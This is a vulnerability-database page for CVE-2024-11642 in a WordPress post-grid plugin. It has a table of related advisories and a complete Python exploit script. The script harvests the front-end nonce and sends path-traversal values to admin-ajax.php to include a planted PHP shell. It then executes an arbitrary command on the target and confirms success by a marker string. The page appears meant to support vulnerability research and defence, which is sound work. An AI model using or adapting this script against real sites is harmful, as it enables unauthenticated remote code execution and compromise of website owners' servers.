| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-11642 | 9 Jan 202511:14 | – | circl | |
| WordPress plugin Post Grid Master 路径遍历漏洞 | 9 Jan 202500:00 | – | cnnvd | |
| CVE-2024-11642 | 9 Jan 202511:11 | – | cve | |
| CVE-2024-11642 Post Grid Master <= 3.4.12 - Missing Authorization to Unauthenticated Local PHP File Inclusion | 9 Jan 202511:11 | – | cvelist | |
| EUVD-2024-34215 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-11642 | 9 Jan 202511:15 | – | nvd | |
| CVE-2024-11642 | 9 Jan 202511:15 | – | osv | |
| WordPress Post Grid Master plugin <= 3.4.12 - Missing Authorization to Unauthenticated Local PHP File Inclusion vulnerability | 8 Jan 202523:56 | – | patchstack | |
| PT-2025-1677 · WordPress · Post Grid Master | 9 Jan 202500:00 | – | ptsecurity | |
| CVE-2024-11642 | 5 Feb 202501:38 | – | redhatcve |
#!/usr/bin/env python3
# Exploit Title: WordPress Plugin Ajax Filter Posts (GridMaster) <= 3.4.11 - Unauthenticated Local File Inclusion to RCE
# Google Dork: N/A
# Date: 2026-07-10
# Exploit Author: A. Ramos <[email protected]> / @aramosf
# Vendor Homepage: https://wordpress.org/plugins/ajax-filter-posts/
# Software Link: https://downloads.wordpress.org/plugin/ajax-filter-posts.3.4.11.zip
# Version: 3.4.11 (REQUIRED)
# Tested on: WordPress 6.6.2, PHP 8.2, MariaDB 10.11 (Docker, Debian 12 / Linux)
# CVE : CVE-2024-11642
"""
Ajax Filter Posts <= 3.4.11 nopriv admin-ajax action asr_filter_posts passes argsArray[grid_style]
(only sanitize_text_field, keeps ../) into get_template_part -> load_template(templates/grid/
<grid_style>.php) (inc/Shortcode.php:649). A path-traversal grid_style pointing at an attacker
.php on disk includes and executes it -> RCE. The asr_ajax_nonce is printed globally on any
front-end page. Prior state: an attacker-controlled .php (setup_state.sh plants one in uploads).
"""
import argparse, sys, re
import requests
requests.packages.urllib3.disable_warnings()
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--target", required=True)
ap.add_argument("--shell-relpath", default="wp-content/uploads/afpshell")
ap.add_argument("--cmd", default="id")
a = ap.parse_args(); base = a.target.rstrip("/")
s = requests.Session(); s.verify = False
m = re.search(r'asr_ajax_params[^{]*\{[^}]*?"nonce":"([a-f0-9]+)"', s.get(base + "/").text) \
or re.search(r'"nonce":"([a-f0-9]+)"', s.get(base + "/").text)
nonce = m.group(1) if m else None
print(f"[*] Target: {base} | asr nonce: {nonce}")
for depth in range(3, 10):
trav = "../" * depth + a.shell_relpath
r = s.post(base + "/wp-admin/admin-ajax.php",
data={"action": "asr_filter_posts", "nonce": nonce, "argsArray[grid_style]": trav},
params={"c": a.cmd}, timeout=20)
if "AFP_PWNED" in r.text:
print(f"\n[+] RCE CONFIRMED (LFI, depth={depth})\n{r.text.split('AFP_PWNED:')[1].strip()}")
return 0
print("\n[-] not confirmed (plant the .php via setup_state.sh)"); return 1
if __name__ == "__main__":
sys.exit(main())Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation